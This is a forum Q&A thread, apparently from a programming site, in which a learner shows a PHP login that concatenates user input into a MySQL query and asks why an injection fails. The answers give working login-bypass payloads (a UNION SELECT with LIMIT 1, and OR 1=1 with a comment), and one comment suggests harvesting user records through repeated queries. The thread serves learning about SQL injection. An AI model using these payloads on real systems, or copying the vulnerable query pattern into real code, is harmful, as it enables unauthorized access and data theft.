# SQL Injection not working when I think it should

Tags: php, sql-injection, mysql

I am trying to learn about PHP and SQL Injections, so I have created a login form where users introduce their username and password and click the Login button. Later in the server I get the passed parameters using $_POST global variable.

This is the code used to check if user credentials are valid:

```
$email = $_POST['u_email'];
$password = $_POST['u_password'];

$query = "SELECT * FROM User WHERE EMAIL='$email' AND PASSWORD='$password'";
$result = $mysqli->query($query);
$counter = mysqli_num_rows($result);

if($counter == 1)//Correct Login
```

The problem is that I think that if a user enters the following text in the username and password fields, the login should be done (although they are not valid values because they do not exist in the DB).

```
Username: xxx' OR '1'='1/*
Password: */
```

I think so because that would be translated to:

```
$query = "SELECT * FROM User WHERE EMAIL='xxx' OR '1'='1/*' AND PASSWORD='*/'";
```

In other words:

```
$query = "SELECT * FROM User WHERE EMAIL='xxx' OR '1'='1'";
```

But the SQL Injection is not working, why?

My DBMS is MySQL.

Answer (score 6, accepted):

It's not working because of this:

```
if($counter == 1)
```

The injected `OR '1'='1'` is valid for every single row, and if there are multiple rows in the table, that `$counter` check will fail.

To get around that, you could do something like this (if I remember my SQL correctly), with anything in `$email` and this in `$password`:

```
' UNION SELECT * FROM User LIMIT 1 --
```

Nothing will be returned from the first part, but the injected second half of the `UNION` will get a single arbitrary row.

Comment: Don't forget you can select a row at random and just keep repeating the query with ever growing exceptions of user IDs to find as much user information as possible over time.

Answer (score 2):

A more common and easy way to comment for SQL injection is to use `--` because you have not to close the comment. It also requires only 1 input instead of 2.

In this case, an easy injection will look like :

```
Username : xxx' OR 1=1;--
Password : not that important
```

The SQL query will be : 
`SELECT * FROM User WHERE EMAIL='' OR 1=1;-- ' AND PASSWORD='not that important'`. Without the comment : `SELECT * FROM User WHERE EMAIL='' OR 1=1;`